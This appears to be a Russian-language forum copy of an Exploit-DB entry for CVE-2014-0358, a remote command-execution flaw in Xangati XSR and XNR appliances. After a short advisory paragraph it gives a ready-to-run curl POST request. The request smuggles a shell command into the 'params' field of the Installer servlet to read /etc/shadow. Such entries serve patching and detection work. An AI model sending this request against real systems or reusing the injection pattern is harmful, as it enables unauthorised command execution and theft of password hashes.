- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39145
- Проверка EDB
-
- Пройдено
- Автор
- JAN KADIJK
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- cve-2014-0358
- Дата публикации
- 2014-04-14
Xangati XSR / XNR - 'gui_input_test.pl' Remote Command Execution
Код:
source: https://www.securityfocus.com/bid/66819/info
Xangati XSR And XNR are prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F¶ms=gui_input_test.pl¶ms=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
'hxxps://www.example.com/servlet/Installer'
- Источник
- www.exploit-db.com